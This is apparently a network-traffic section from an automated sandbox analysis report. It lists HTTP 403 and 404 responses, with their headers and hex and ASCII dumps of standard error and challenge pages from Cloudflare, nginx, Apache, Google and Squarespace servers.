                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 05 Jul 2023 06:07:22 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rQyaUO%2FJnmnM1vDtdtQcnHANSVMY5lA5THBcpMz%2FY4HouudTGNyf538vEz5y8p%2BZJG7WHKCMmiz7Ioo7ar6sGApy%2FSf3jvKSJUYENKyVihitkNqTEzqWrEMHwFR4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6d056c3f1e4c-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 39 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 Data Ascii: 119e<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equi
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:07 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:07 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:07 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:07:07 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1561X-XSS-Protection: 0X-Frame-Options: SAMEORIGINData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=i8v4cp7%2FpwysHxTzycmzO0iZAmPRTJiE1Wkn4bsuxMoy3j%2Fr7%2BU%2BxfzkXEYQncnAHep%2BUmLusEUbTbHyS2%2F5r3pXlqhKQ48WQ4bMZP8Ic3H6AP5%2BmQd7bEtqYw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6d095e2c9b74-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 62 32 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 Data Ascii: 1b2a<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="C
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:08 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 05 Jul 2023 06:07:08 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=Be9aScHMA1uxZGFmYzRmMmQwNzk3MTMwNzk5MDkzYzM3M2FlMTE2;Path=/X-Contextid: 6T3dX32E/bIWqgLLbData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
